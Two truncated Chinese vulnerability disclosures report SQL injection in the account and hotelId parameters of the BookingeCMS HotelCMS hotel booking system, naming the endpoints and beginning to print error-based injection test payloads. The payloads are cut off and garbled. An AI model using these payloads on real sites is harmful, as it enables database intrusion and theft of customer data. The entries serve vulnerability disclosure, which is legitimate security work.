BookingeCMS HotelCMS酒店预订管理系统account参数SQL注入

0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=login.checkAccount&account= 文件account参数存在注入 0x02 漏洞利用 测试Payload: （get提交） /?m=login.checkAccount&account= /?m=login.checkAccount&account= ' AND SELECT 9468 FROMSELECT...

BookingeCMS HotelCMS酒店预订管理系统hotelId参数存在注入

0x01 漏洞简述 提交时间： 2015-09-04 13:33 公开时间： 2015-12-06 09:00 漏洞类型： SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.getHotelInfo 文件hotelId参数存在注入 0x02 漏洞利用 测试Payload: （post提交） /?m=hotel.getHotelInfo hotelId=11 AND SELECT 6261 FROMSELECT COUNT,CONCAT0x7c,MIDIFNULLCASTDATABASE AS...